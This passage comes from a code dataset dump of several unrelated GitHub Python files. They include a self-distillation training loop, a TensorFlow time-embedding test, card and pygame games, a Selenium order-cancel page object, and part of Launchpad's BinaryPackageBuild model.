method: {}'.format(args.method))\n loss = loss_cls + loss_div\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n train_loss.update(loss.item(), batch_size)\n train_loss_cls.update(loss_cls.item(), batch_size)\n train_loss_div.update(loss_div.item(), batch_size)\n\n top1, top5 = correct_num(logit, targets, topk=(1, 5))\n top1_num += top1\n top5_num += top5\n total += targets.size(0)\n \n print('Epoch:{}, batch_idx:{}/{}, lr:{:.5f}, Acc:{:.4f}, Duration:{:.2f}'.format(epoch, batch_idx, len(trainloader), lr, top1_num.item() / total, time.time()-batch_start_time))\n\n train_info = 'Epoch:{}\\t lr:{:.5f}\\t duration:{:.3f}'\\\n '\\ntrain_loss:{:.5f}\\t train_loss_cls:{:.5f}'\\\n '\\t train_loss_div:{:.5f}' \\\n '\\ntrain top1_acc: {:.4f} \\t train top5_acc:{:.4f}' \\\n .format(epoch, lr, time.time() - start_time,\n train_loss.avg, train_loss_cls.avg,\n train_loss_div.avg, (top1_num/total).item(), (top5_num/total).item())\n print(train_info)\n with open(args.log_txt, 'a+') as f:\n f.write(train_info+'\\n')\n\n if args.method.startswith('PSKD'):\n torch.save({'prev_pred': all_predictions.cpu()}, os.path.join(args.checkpoint_dir, 'predictions.pth.tar'))\n\n\n\ndef test(epoch, criterion_list):\n test_loss = AverageMeter('test_loss', ':.4e')\n top1_num = 0\n top5_num = 0\n total = 0\n\n criterion_cls = criterion_list[0]\n net.eval()\n with torch.no_grad():\n for batch_idx, (inputs, targets) in enumerate(valloader):\n inputs = inputs.cuda()\n targets = targets.cuda()\n\n logit = net(inputs)\n \n if isinstance(logit, list) or isinstance(logit, tuple):\n logit = logit[0]\n loss_cls = criterion_cls(logit, targets)\n \n\n test_loss.update(loss_cls.item(), inputs.size(0))\n\n top1, top5 = correct_num(logit, targets, topk=(1, 5))\n top1_num += top1\n top5_num += top5\n total += targets.size(0)\n\n print('Epoch:{}, batch_idx:{}/{}, Acc:{:.4f}'.format(epoch, batch_idx, len(trainloader), top1_num.item() / total))\n\n\n test_info = 'test_loss:{:.5f}\\t test top1_acc:{:.4f} \\t test top5_acc:{:.4f} \\n' \\\n .format(test_loss.avg, (top1_num/total).item(), (top5_num/total).item())\n with open(args.log_txt, 'a+') as f:\n f.write(test_info)\n print(test_info)\n\n return (top1_num/total).item()\n\n\n\nif __name__ == '__main__':\n best_acc = 0. # best test accuracy\n start_epoch = 0 # start from epoch 0 or last checkpoint epoch\n\n criterion_cls = nn.CrossEntropyLoss()\n criterion_div = DistillKL(args.T)\n\n criterion_list = nn.ModuleList([])\n criterion_list.append(criterion_cls) # classification loss\n criterion_list.append(criterion_div)\n criterion_list.cuda()\n\n if args.evaluate:\n print('load trained weights from '+ args.eval_checkpoint)\n checkpoint = torch.load(args.eval_checkpoint_dir,\n map_location=torch.device('cpu'))\n net.module.load_state_dict(checkpoint['net'])\n best_acc = checkpoint['acc']\n start_epoch = checkpoint['epoch'] + 1\n top1_acc = test(start_epoch, criterion_list)\n else:\n trainable_list = nn.ModuleList([])\n trainable_list.append(net)\n optimizer = optim.SGD(trainable_list.parameters(), lr=0.1, momentum=0.9, weight_decay=args.weight_decay, nesterov=True)\n\n if args.resume:\n print('Resume from '+ args.resume_checkpoint)\n checkpoint = torch.load(args.resume_checkpoint,\n map_location=torch.device('cpu'))\n net.module.load_state_dict(checkpoint['net'])\n optimizer.load_state_dict(checkpoint['optimizer'])\n best_acc = checkpoint['acc']\n start_epoch = checkpoint['epoch']+1\n\n for epoch in range(start_epoch, args.epochs):\n train(epoch, criterion_list, optimizer)\n acc = test(epoch, criterion_list)\n\n state = {\n 'net': net.module.state_dict(),\n 'acc': acc,\n 'epoch': epoch,\n 'optimizer': optimizer.state_dict()\n }\n torch.save(state, os.path.join(args.checkpoint_dir, model.__name__ + '.pth.tar'))\n\n is_best = False\n if best_acc < acc:\n best_acc = acc\n is_best = True\n\n if is_best:\n shutil.copyfile(os.path.join(args.checkpoint_dir, model.__name__ + '.pth.tar'),\n os.path.join(args.checkpoint_dir, model.__name__ + '_best.pth.tar'))\n\n print('Evaluate the best model:')\n args.evaluate = True\n checkpoint = torch.load(args.checkpoint_dir + '/' + model.__name__ + '_best.pth.tar',\n map_location=torch.device('cpu'))\n net.module.load_state_dict(checkpoint['net'])\n start_epoch = checkpoint['epoch']\n top1_acc = test(start_epoch, criterion_list)\n\n with open(args.log_txt, 'a+') as f:\n f.write('best_accuracy: {} \\n'.format(best_acc))\n print('best_accuracy: {} \\n'.format(best_acc))\n\n","repo_name":"winycg/Self-KD-Lib","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":15303,"program_lang":"python","lang":"en","doc_type":"code","stars":82,"dataset":"github-code","pt":"61"} +{"seq_id":"6341695355","text":"# -*- coding: utf-8 -*-\n# @Time : 2020/8/19 21:00\n# @Author : zxl\n# @FileName: test.py\n\nimport numpy as np\nimport tensorflow as tf\nfrom sklearn.metrics import roc_auc_score,f1_score,recall_score,precision_score,accuracy_score\nfrom Model.Modules.net_utils import gather_indexes\n\n\nbatch_size = 2\nseq_len = 3\nM = 5\n\n\ntime_lst = tf.constant([[0,0,0],\n [1,2,2]],dtype=tf.float32)\n\nsingle_odd_mask = np.zeros(shape = (M,))\nsingle_odd_mask[::2] = 1\nsingle_odd_mask = tf.convert_to_tensor(single_odd_mask,dtype=tf.float32) # M,\nsingle_even_mask = np.zeros(shape = (M,))\nsingle_even_mask[1::2] = 1\nsingle_even_mask = tf.convert_to_tensor(single_even_mask,dtype=tf.float32)\n\nemb_time_lst = tf.tile(tf.expand_dims(time_lst,axis = 2),[1,1,M]) # batch_size, seq_len, M\n\nsingle_odd_deno = tf.to_float(10000 ** (tf.range(start = 0, limit = M, delta = 1)/M))# M,\nsingle_even_deno = tf.to_float(10000 **(tf.range(start = 1, limit = M+1, delta = 1)/M))\n\nodd_emb = tf.cos(emb_time_lst/single_odd_deno)\neven_emb = tf.sin(emb_time_lst/single_even_deno)\ntime_lst_emb = odd_emb * single_odd_mask + even_emb * single_even_mask\n\n# b = tf.Variable(tf.random_normal([1]))\n# loss = tf.reduce_mean(tf.reduce_mean(masked_emb,axis = 2),axis = 1) + b\n# train = tf.train.AdamOptimizer(0.001).minimize(loss)\n\n\nwith tf.Session() as sess:\n print(sess.run(time_lst_emb))\n # print(sess.run(even_mask))\n print('---------------')\n\n\n # cur_time_lst = np.array([[0., 0., 0.],\n # [1., 2., 2.]])\n # feed_dict = {}\n # feed_dict[time_lst] = cur_time_lst\n # sess.run(tf.global_variables_initializer(), feed_dict)\n # sess.run(tf.local_variables_initializer(), feed_dict)\n #\n # for epoch in range(10):\n # cur_time_lst = np.random.rand(2,3)\n # feed_dict = {}\n # feed_dict[time_lst] = cur_time_lst\n # sess.run(train, feed_dict )\n # print(sess.run(loss,feed_dict))\n\n\n # print(sess.run(result))\n\n\n\n# indices = tf.constant([[4], [3], [1], [7]])\n# updates = tf.constant([9, 10, 11, 12])\n# shape = tf.constant([8])\n# scatter = tf.scatter_nd(indices, updates, shape)\n# with tf.Session() as sess:\n# print(sess.run(scatter))\n","repo_name":"Jane11111/TPP_V2","sub_path":"test/test_time_emb.py","file_name":"test_time_emb.py","file_ext":"py","file_size_in_byte":2191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8939646248","text":"from SleepingQueens.Position import HandPosition\nfrom SleepingQueens.dataStructures import Card\nfrom SleepingQueens.dataStructures import CardType\nfrom SleepingQueens.DrawingAndTrashPile import DrawingAndTrashPile\nfrom SleepingQueens.DrawingAndTrashPile import DiscardAll\n\n\nclass Hand:\n\n def __init__(self, playerIdx : int, currentHand : dict[int,Card], drawingAndTrashPile : DrawingAndTrashPile):\n self.playerIdx = playerIdx\n self.pickedCards : list[Card]\n self.currentHand = currentHand\n self.drawingAndTrashPile = drawingAndTrashPile #toto sem spadne z Game() pri inicializacii\n\n def pickCards(self, positions : list[HandPosition]) -> list[Card]: #\n out = []\n for pos in positions:\n out.append(self.currentHand[pos.getCardIndex()])\n\n self.pickedCards = out\n return out\n\n def removePickedCardsAndRedraw(self) -> list[Card]:\n return self.drawingAndTrashPile.discardAndDraw(self.pickedCards,\n DiscardAll(self.drawingAndTrashPile.drawingPile,\n self.drawingAndTrashPile.trashPile,\n self.returnPickedCards(),))\n def returnPickedCards(self):\n return self.pickedCards\n\n def hasCardOfType(self, type : CardType):\n for index,card in self.currentHand.items():\n if type == card.type:\n return HandPosition(index, self.playerIdx)\n #ak nema hrac danu kartu\n return HandPosition(-1, -1)\n\n def getCards(self):\n return [i for i in self.currentHand.values()]\n","repo_name":"mibrix/PTS_DU_git","sub_path":"SleepingQueens/Hand.py","file_name":"Hand.py","file_ext":"py","file_size_in_byte":1688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8827623885","text":"from po.base_page import BasePage\n\nclass OrderPage(BasePage):\n URL = 'http://testingedu.com.cn:8000/index.php/Home/Order/order_list.html'\n\n def cancel_order(self):\n \n self.get_url(self.URL)\n self.sleep(2)\n print(\"self.order_no:\",self.driver.order_no)\n locator = '//em[text()=\"%s\"]/../..//a[text()=\"取消订单\"]'%self.driver.order_no\n self.click(locator)\n self.click('//a[text()=\"确定\"]')\n self.sleep(5)\n","repo_name":"candice0430/mall_ui_test","sub_path":"po/OrderPage.py","file_name":"OrderPage.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5358712932","text":"import pygame\nimport time\n\nfrom modules import playerChar as pc\nfrom modules import collide_block as cb\n\ndef main():\n\n pygame.init()\n screen = (800,600)\n game_window = pygame.display.set_mode(screen)\n game_window.fill((38,237,229))\n pygame.display.flip()\n \n \n game_clock = pygame.time.Clock()\n \n # hard coded blocks/terrain\n collide_block0 = cb.collide_block(pygame,72,420)\n collide_block = cb.collide_block(pygame,200,420)\n collide_block3 = cb.collide_block(pygame,264,420)\n collide_block5 = cb.collide_block(pygame,328,420)\n collide_block6 = cb.collide_block(pygame,392,420)\n collide_block7 = cb.collide_block(pygame,456,420)\n collide_block8 = cb.collide_block(pygame,520,420)\n collide_block9 = cb.collide_block(pygame,136,420)\n collide_block10 = cb.collide_block(pygame,456,356)\n collide_block11 = cb.collide_block(pygame,456,292)\n collide_block12 = cb.collide_block(pygame,456,228)\n collide_block13 = cb.collide_block(pygame,200,282)\n collide_block14 = cb.collide_block(pygame,264,282)\n\n block_list = []\n block_list.append(collide_block)\n block_list.append(collide_block3)\n block_list.append(collide_block5)\n block_list.append(collide_block6)\n block_list.append(collide_block7)\n block_list.append(collide_block8)\n block_list.append(collide_block9)\n block_list.append(collide_block10)\n block_list.append(collide_block11)\n block_list.append(collide_block12)\n block_list.append(collide_block13)\n block_list.append(collide_block14)\n block_list.append(collide_block0)\n \n player = pc.playerChar(pygame,200,270)\n\n game_window.fill((10,100,40))\n\n grounded = False\n can_jump = [0]\n touching_top_block = [0]\n projectiles = []\n while(True):\n \n \n game_clock.tick(150)\n game_window.fill((3,245,229))\n \n player.y += 1\n player.hitbox.y +=1\n\n for i in block_list:\n game_window.blit(i.img,(i.x,i.y))\n \n \n player.player_move(can_jump)\n touching_top_block[0] = 0\n for i in block_list:\n if(player.hitbox.colliderect(i.up)):\n can_jump[0] = 1\n\n player.y -=1\n player.hitbox.y -=1\n \n touching_top_block[0] = 1\n \n if(player.hitbox.colliderect(i.left)):\n player.velocity_x -= 1\n player.velocity_y = 0\n \n continue\n if(player.hitbox.colliderect(i.right)):\n player.velocity_x += 1\n player.velocity_y = 0\n \n continue\n if(player.hitbox.colliderect(i.down)):\n player.velocity_y +=2\n continue\n if(touching_top_block[0] == 0):\n can_jump[0] = 0\n\n \n game_window.blit(player.img,(player.x,player.y)) \n \n pygame.display.flip()\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n return 0\n\n \nmain()\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"jsteyn135/python-pygame-basic-hitboxes","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4187172269","text":"import pygame\nfrom pygame.locals import *\nimport numpy as np\nimport ctypes\n\n\npygame.init()\nctypes.windll.user32.SetProcessDPIAware()\n\n# Display variables\ninfoObject = pygame.display.Info()\n\n# display_width = 1550\n# display_height = 835\ndisplay_width = infoObject.current_w\ndisplay_height = infoObject.current_h\n\ndisplay_area = display_width * display_height\n\nblack = (0,0,0)\nwhite = (255,255,255)\nred = (255,0,0)\nblue = (0,0,255)\ngreen = (0,255,0)\norange = (255,165,0)\ngray = (127,127,127)\n\n# Camera Variables\nbg = None\ncalibrate_frames = 30\ntop, right, bottom, left = 195, 255, 430, 420\naWeight = 0.5\n\n# PyGame variables\nflags = DOUBLEBUF\nwin = pygame.display.set_mode((display_width, display_height), flags)\npygame.display.set_caption('NARUTO: THE COMPUTER-VISION GAME')\n\nplayer_turn = True\nactive_health = 0\nactive_damage = 0\n\n# Model Variables\nnum_frames = 0\ncount = 0\nmean_cutoff = 6\naccumulated_predictions = np.array([[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], dtype='float64')\ntop_signs = []\nsequence = []\nsigns = ['bird', 'boar', 'dog', 'dragon', 'hare', 'horse', 'monkey', 'ox', 'ram', 'rat', 'serpent', 'tiger']\n\n# Options\neasymode = False\nhardmode = True\nshowsigns = True\n","repo_name":"averyzgriffin/NarutoCV","sub_path":"global_variables.py","file_name":"global_variables.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"36042843464","text":"__metaclass__ = type\n__all__ = [\n 'BinaryPackageBuild',\n 'BinaryPackageBuildSet',\n ]\n\nimport datetime\nfrom operator import itemgetter\n\nimport apt_pkg\nimport pytz\nfrom sqlobject import SQLObjectNotFound\nfrom storm.expr import (\n Desc,\n Join,\n LeftJoin,\n Or,\n )\nfrom storm.locals import (\n Bool,\n DateTime,\n Int,\n Reference,\n Unicode,\n )\nfrom storm.store import (\n EmptyResultSet,\n Store,\n )\nfrom storm.zope import IResultSet\nfrom zope.component import getUtility\nfrom zope.interface import implements\n\nfrom lp.app.browser.tales import DurationFormatterAPI\nfrom lp.app.errors import NotFoundError\nfrom lp.app.interfaces.launchpad import ILaunchpadCelebrities\nfrom lp.archivepublisher.utils import get_ppa_reference\nfrom lp.buildmaster.enums import (\n BuildFarmJobType,\n BuildStatus,\n )\nfrom lp.buildmaster.interfaces.buildfarmjob import IBuildFarmJobSource\nfrom lp.buildmaster.model.builder import Builder\nfrom lp.buildmaster.model.buildfarmjob import BuildFarmJob\nfrom lp.buildmaster.model.buildqueue import BuildQueue\nfrom lp.buildmaster.model.packagebuild import PackageBuildMixin\nfrom lp.registry.interfaces.distribution import IDistribution\nfrom lp.registry.interfaces.distroseries import IDistroSeries\nfrom lp.registry.interfaces.pocket import PackagePublishingPocket\nfrom lp.registry.model.sourcepackagename import SourcePackageName\nfrom lp.services.config import config\nfrom lp.services.database.bulk import load_related\nfrom lp.services.database.decoratedresultset import DecoratedResultSet\nfrom lp.services.database.enumcol import DBEnum\nfrom lp.services.database.interfaces import IStore\nfrom lp.services.database.sqlbase import (\n SQLBase,\n sqlvalues,\n )\nfrom lp.services.job.model.job import Job\nfrom lp.services.librarian.browser import ProxiedLibraryFileAlias\nfrom lp.services.librarian.model import (\n LibraryFileAlias,\n LibraryFileContent,\n )\nfrom lp.services.mail.helpers import (\n get_contact_email_addresses,\n get_email_template,\n )\nfrom lp.services.mail.sendmail import (\n format_address,\n simple_sendmail,\n )\nfrom lp.services.webapp import canonical_url\nfrom lp.soyuz.enums import ArchivePurpose\nfrom lp.soyuz.interfaces.binarypackagebuild import (\n BuildSetStatus,\n CannotBeRescored,\n IBinaryPackageBuild,\n IBinaryPackageBuildSet,\n UnparsableDependencies,\n )\nfrom lp.soyuz.interfaces.distroarchseries import IDistroArchSeries\nfrom lp.soyuz.model.binarypackagename import BinaryPackageName\nfrom lp.soyuz.model.binarypackagerelease import BinaryPackageRelease\nfrom lp.soyuz.model.buildpackagejob import BuildPackageJob\nfrom lp.soyuz.model.files import BinaryPackageFile\nfrom lp.soyuz.model.queue import (\n PackageUpload,\n PackageUploadBuild,\n )\n\n\nclass BinaryPackageBuild(PackageBuildMixin, SQLBase):\n implements(IBinaryPackageBuild)\n _table = 'BinaryPackageBuild'\n _defaultOrder = 'id'\n\n job_type = BuildFarmJobType.PACKAGEBUILD\n\n build_farm_job_id = Int(name='build_farm_job')\n build_farm_job = Reference(build_farm_job_id, BuildFarmJob.id)\n\n distro_arch_series_id = Int(name='distro_arch_series', allow_none=False)\n distro_arch_series = Reference(\n distro_arch_series_id, 'DistroArchSeries.id')\n source_package_release_id = Int(\n name='source_package_release', allow_none=False)\n source_package_release = Reference(\n source_package_release_id, 'SourcePackageRelease.id')\n\n archive_id = Int(name='archive', allow_none=False)\n archive = Reference(archive_id, 'Archive.id')\n\n pocket = DBEnum(\n name='pocket', enum=PackagePublishingPocket, allow_none=False)\n\n upload_log_id = Int(name='upload_log')\n upload_log = Reference(upload_log_id, 'LibraryFileAlias.id')\n\n dependencies = Unicode(name='dependencies')\n\n processor_id = Int(name='processor')\n processor = Reference(processor_id, 'Processor.id')\n virtualized = Bool(name='virtualized')\n\n date_created = DateTime(\n name='date_created', tzinfo=pytz.UTC, allow_none=False)\n date_started = DateTime(name='date_started', tzinfo=pytz.UTC)\n date_finished = DateTime(name='date_finished', tzinfo=pytz.UTC)\n date_first_dispatched = DateTime(\n name='date_first_dispatched', tzinfo=pytz.UTC)\n\n builder_id = Int(name='builder')\n builder = Reference(builder_id, 'Builder.id')\n\n status = DBEnum(name='status', enum=BuildStatus, allow_none=False)\n\n log_id = Int(name='log')\n log = Reference(log_id, 'LibraryFileAlias.id')\n\n failure_count = Int(name='failure_count', allow_none=False)\n\n distribution_id = Int(name='distribution', allow_none=False)\n distribution = Reference(distribution_id, 'Distribution.id')\n\n distro_series_id = Int(name='distro_series', allow_none=False)\n distro_series = Reference(distro_series_id, 'DistroSeries.id')\n\n is_distro_archive = Bool(name='is_distro_archive', allow_none=False)\n\n source_package_name_id = Int(name='source_package_name', allow_none=False)\n source_package_name = Reference(\n source_package_name_id, 'SourcePackageName.id')\n\n @property\n def buildqueue_record(self):\n \"\"\"See `IBuild`.\"\"\"\n store = Store.of(self)\n results = store.find(\n BuildQueue,\n BuildPackageJob.job == BuildQueue.jobID,\n BuildPackageJob.build == self.id)\n return results.one()\n\n def _getLatestPublication(self):\n from lp.soyuz.model.publishing import SourcePackagePublishingHistory\n store = Store.of(self)\n results = store.find(\n SourcePackagePublishingHistory,\n SourcePackagePublishingHistory.archive == self.archive,\n SourcePackagePublishingHistory.distroseries == self.distro_series,\n SourcePackagePublishingHistory.sourcepackagerelease ==\n self.source_package_release)\n return results.order_by(\n Desc(SourcePackagePublishingHistory.id)).first()\n\n @property\n def current_component(self):\n \"\"\"See `IBuild`.\"\"\"\n latest_publication = self._getLatestPublication()\n # Production has some buggy builds without source publications.\n # They seem to have been created by early versions of gina and\n # the readding of hppa.\n if latest_publication is not None:\n return latest_publication.component\n\n @property\n def current_source_publication(self):\n \"\"\"See `IBuild`.\"\"\"\n from lp.soyuz.interfaces.publishing import active_publishing_status\n latest_publication = self._getLatestPublication()\n if (latest_publication is not None and\n latest_publication.status in active_publishing_status):\n return latest_publication\n return None\n\n @property\n def upload_changesfile(self):\n \"\"\"See `IBuild`\"\"\"\n package_upload = self.package_upload\n if package_upload is None:\n return None\n return package_upload.changesfile\n\n @property\n def changesfile_url(self):\n \"\"\"See `IBinaryPackageBuild`.\"\"\"\n changesfile = self.upload_changesfile\n if changesfile is None:\n return None\n return ProxiedLibraryFileAlias(changesfile, self).http_url\n\n @property\n def package_upload(self):\n \"\"\"See `IBuild`.\"\"\"\n store = Store.of(self)\n # The join on 'changesfile' is used for pre-fetching the\n # corresponding library file, so callsites don't have to issue an\n # extra query.\n origin = [\n PackageUploadBuild,\n Join(PackageUpload,\n PackageUploadBuild.packageuploadID == PackageUpload.id),\n Join(LibraryFileAlias,\n LibraryFileAlias.id == PackageUpload.changes_file_id),\n Join(LibraryFileContent,\n LibraryFileContent.id == LibraryFileAlias.contentID),\n ]\n results = store.using(*origin).find(\n (PackageUpload, LibraryFileAlias, LibraryFileContent),\n PackageUploadBuild.build == self,\n PackageUpload.archive == self.archive,\n PackageUpload.distroseries == self.distro_series)\n\n # Return the unique `PackageUpload` record that corresponds to the\n # upload of the result of this `Build`, load the `LibraryFileAlias`\n # and the `LibraryFileContent` in cache because it's most likely\n # they will be needed.\n return DecoratedResultSet(results, itemgetter(0)).one()\n\n @property\n def is_virtualized(self):\n \"\"\"See `IBuild`\"\"\"\n return self.archive.require_virtualized\n\n @property\n def title(self):\n \"\"\"See `IBuild`\"\"\"\n return '%s build of %s %s in %s %s %s' % (\n self.distro_arch_series.architecturetag,\n self.source_package_release.name,\n self.source_package_release.version,\n self.distribution.name, self.distro_series.name, self.pocket.name)\n\n @property\n def was_built(self):\n \"\"\"See `IBuild`\"\"\"\n return self.status not in [BuildStatus.NEEDSBUILD,\n BuildStatus.BUILDING,\n BuildStatus.UPLOADING,\n BuildStatus.SUPERSEDED]\n\n @property\n def arch_tag(self):\n \"\"\"See `IBuild`.\"\"\"\n return self.distro_arch_series.architecturetag\n\n @property\n def log_url(self):\n \"\"\"See `IPackageBuild`.\n\n Overridden here for the case of builds for distro archives,\n currently only supported for binary package builds.\n \"\"\"\n if self.log is None:\n return None\n return ProxiedLibraryFileAlias(self.log, self).http_url\n\n @property\n def upload_log_url(self):\n \"\"\"See `IPackageBuild`.\n\n Overridden here for the case of builds for distro archives,\n currently only supported for binary package builds.\n \"\"\"\n if self.upload_log is None:\n return None\n return ProxiedLibraryFileAlias(self.upload_log, self).http_url\n\n @property\n def distributionsourcepackagerelease(self):\n \"\"\"See `IBuild`.\"\"\"\n from lp.soyuz.model.distributionsourcepackagerelease \\\n import (\n DistributionSourcePackageRelease)\n\n return DistributionSourcePackageRelease(\n distribution=self.distribution,\n sourcepackagerelease=self.source_package_release)\n\n def getBinaryPackageNamesForDisplay(self):\n \"\"\"See `IBuildView`.\"\"\"\n store = Store.of(self)\n result = store.find(\n (BinaryPackageRelease, BinaryPackageName),\n BinaryPackageRelease.build == self,\n BinaryPackageRelease.binarypackagename == BinaryPackageName.id,\n BinaryPackageName.id == BinaryPackageRelease.binarypackagenameID)\n return result.order_by(\n [BinaryPackageName.name, BinaryPackageRelease.id])\n\n def getBinaryFilesForDisplay(self):\n \"\"\"See `IBuildView`.\"\"\"\n store = Store.of(self)\n result = store.find(\n (BinaryPackageRelease, BinaryPackageFile, LibraryFileAlias,\n LibraryFileContent),\n BinaryPackageRelease.build == self,\n BinaryPackageRelease.id ==\n BinaryPackageFile.binarypackagereleaseID,\n LibraryFileAlias.id == BinaryPackageFile.libraryfileID,\n LibraryFileContent.id == LibraryFileAlias.contentID)\n return result.order_by(\n [LibraryFileAlias.filename, BinaryPackageRelease.id]).config(\n distinct=True)\n\n @property\n def binarypackages(self):\n \"\"\"See `IBuild`.\"\"\"\n return BinaryPackageRelease.select(\"\"\"\n BinaryPackageRelease.build = %s AND\n BinaryPackageRelease.binarypackagename = BinaryPackageName.id\n \"\"\" % sqlvalues(self),\n clauseTables=[\"BinaryPackageName\"],\n orderBy=[\"BinaryPackageName.name\", \"BinaryPackageRelease.id\"],\n prejoins=[\"binarypackagename\", \"component\", \"section\"])\n\n @property\n def distroarchseriesbinarypackages(self):\n \"\"\"See `IBuild`.\"\"\"\n # Avoid circular import by importing locally.\n from lp.soyuz.model.distroarchseriesbinarypackagerelease import (\n DistroArchSeriesBinaryPackageRelease)\n return [DistroArchSeriesBinaryPackageRelease(\n self.distro_arch_series, bp)\n for bp in self.binarypackages]\n\n @property\n def can_be_retried(self):\n \"\"\"See `IBuild`.\"\"\"\n # First check that the slave scanner would pick up the build record\n # if we reset it.\n if not self.archive.canModifySuite(self.distro_series, self.pocket):\n # The slave scanner would not pick this up, so it cannot be\n # re-tried.\n return False\n\n failed_statuses = [\n BuildStatus.FAILEDTOBUILD,\n BuildStatus.MANUALDEPWAIT,\n BuildStatus.CHROOTWAIT,\n BuildStatus.FAILEDTOUPLOAD,\n BuildStatus.CANCELLED,\n ]\n\n # If the build is currently in any of the failed states,\n # it may be retried.\n return self.status in failed_statuses\n\n @property\n def can_be_rescored(self):\n \"\"\"See `IBuild`.\"\"\"\n return self.status is BuildStatus.NEEDSBUILD\n\n @property\n def can_be_cancelled(self):\n \"\"\"See `IBuild`.\"\"\"\n if not self.buildqueue_record:\n return False\n\n cancellable_statuses = [\n BuildStatus.BUILDING,\n BuildStatus.NEEDSBUILD,\n ]\n return self.status in cancellable_statuses\n\n def retry(self):\n \"\"\"See `IBuild`.\"\"\"\n assert self.can_be_retried, \"Build %s cannot be retried\" % self.id\n self.build_farm_job.status = self.status = BuildStatus.NEEDSBUILD\n self.build_farm_job.date_finished = self.date_finished = None\n self.date_started = None\n self.build_farm_job.builder = self.builder = None\n self.log = None\n self.upload_log = None\n self.dependencies = None\n self.failure_count = 0\n self.queueBuild()\n\n def rescore(self, score):\n \"\"\"See `IBuild`.\"\"\"\n if not self.can_be_rescored:\n raise CannotBeRescored(\"Build cannot be rescored.\")\n\n self.buildqueue_record.manualScore(score)\n\n @property\n def api_score(self):\n \"\"\"See `IBinaryPackageBuild`.\"\"\"\n # Score of the related buildqueue record (if any)\n if self.buildqueue_record is None:\n return None\n else:\n return self.buildqueue_record.lastscore\n\n def cancel(self):\n \"\"\"See `IBinaryPackageBuild`.\"\"\"\n if not self.can_be_cancelled:\n return\n\n # If the build is currently building we need to tell the\n # buildd-manager to terminate it.\n if self.status == BuildStatus.BUILDING:\n self.updateStatus(BuildStatus.CANCELLING)\n return\n\n # Otherwise we can cancel it here.\n self.buildqueue_record.cancel()\n\n def makeJob(self):\n \"\"\"See `IBuildFarmJob`.\"\"\"\n store = Store.of(self)\n job = Job()\n store.add(job)\n specific_job = BuildPackageJob(build=self, job=job)\n store.add(specific_job)\n return specific_job\n\n def _parseDependencyToken(self, token):\n \"\"\"Parse the given token.\n\n Raises AssertionError if the given token couldn't be parsed.\n\n Return a triple containing the corresponding (name, version,\n relation) for the given dependency token.\n \"\"\"\n # XXX cprov 2006-02-27: it may not work for and'd and or'd syntax.\n try:\n name, version, relation = token[0]\n except ValueError:\n raise AssertionError(\n \"APT is not dealing correctly with a dependency token \"\n \"'%r' from %s (%s) with the following dependencies: %s\\n\"\n \"It is expected to be a tuple containing only another \"\n \"tuple with 3 elements (name, version, relation).\"\n % (token, self.title, self.id, self.dependencies))\n # Map relations to the canonical form used in control files.\n if relation == '<':\n relation = '<<'\n elif relation == '>':\n relation = '>>'\n return (name, version, relation)\n\n def _checkDependencyVersion(self, available, required, relation):\n \"\"\"Return True if the available version satisfies the context.\"\"\"\n # This dict maps the package version relationship syntax in lambda\n # functions which returns boolean according to the results of\n # apt_pkg.version_compare function (see the order above).\n # For further information about pkg relationship syntax see:\n #\n # http://www.debian.org/doc/debian-policy/ch-relationships.html\n #\n version_relation_map = {\n # any version is acceptable if no relationship is given\n '': lambda x: True,\n # strictly later\n '>>': lambda x: x == 1,\n # later or equal\n '>=': lambda x: x >= 0,\n # strictly equal\n '=': lambda x: x == 0,\n # earlier or equal\n '<=': lambda x: x <= 0,\n # strictly earlier\n '<<': lambda x: x == -1,\n }\n\n # Use apt_pkg function to compare versions\n # it behaves similar to cmp, i.e. returns negative\n # if first < second, zero if first == second and\n # positive if first > second.\n dep_result = apt_pkg.version_compare(available, required)\n\n return version_relation_map[relation](dep_result)\n\n def _isDependencySatisfied(self, token):\n \"\"\"Check if the given dependency token is satisfied.\n\n Check if the dependency exists and that its version constraint is\n satisfied.\n \"\"\"\n name, version, relation = self._parseDependencyToken(token)\n\n # There may be several published versions in the available\n # archives and pockets. If any one of them satisifies our\n # constraints, the dependency is satisfied.\n dep_candidates = self.archive.findDepCandidates(\n self.distro_arch_series, self.pocket, self.current_component,\n self.source_package_release.sourcepackagename.name, name)\n\n for dep_candidate in dep_candidates:\n if self._checkDependencyVersion(\n dep_candidate.binarypackagerelease.version, version,\n relation):\n return True\n\n return False\n\n def _toAptFormat(self, token):\n \"\"\"Rebuild dependencies line in apt format.\"\"\"\n name, version, relation = self._parseDependencyToken(token)\n if relation and version:\n return '%s (%s %s)' % (name, relation, version)\n return '%s' % name\n\n def updateDependencies(self):\n \"\"\"See `IBuild`.\"\"\"\n\n # apt_pkg requires init_system to get version_compare working\n # properly.\n apt_pkg.init_system()\n\n # Check package build dependencies using apt_pkg\n try:\n parsed_deps = apt_pkg.parse_depends(self.dependencies)\n except (ValueError, TypeError):\n raise UnparsableDependencies(\n \"Build dependencies for %s (%s) could not be parsed: '%s'\\n\"\n \"It indicates that something is wrong in buildd-slaves.\"\n % (self.title, self.id, self.dependencies))\n\n remaining_deps = [\n self._toAptFormat(token) for token in parsed_deps\n if not self._isDependencySatisfied(token)]\n\n # Update dependencies line\n self.dependencies = u\", \".join(remaining_deps)\n\n def __getitem__(self, name):\n return self.getBinaryPackageRelease(name)\n\n def getBinaryPackageRelease(self, name):\n \"\"\"See `IBuild`.\"\"\"\n for binpkg in self.binarypackages:\n if binpkg.name == name:\n return binpkg\n raise NotFoundError('No binary package \"%s\" in build' % name)\n\n def createBinaryPackageRelease(\n self, binarypackagename, version, summary, description,\n binpackageformat, component, section, priority, installedsize,\n 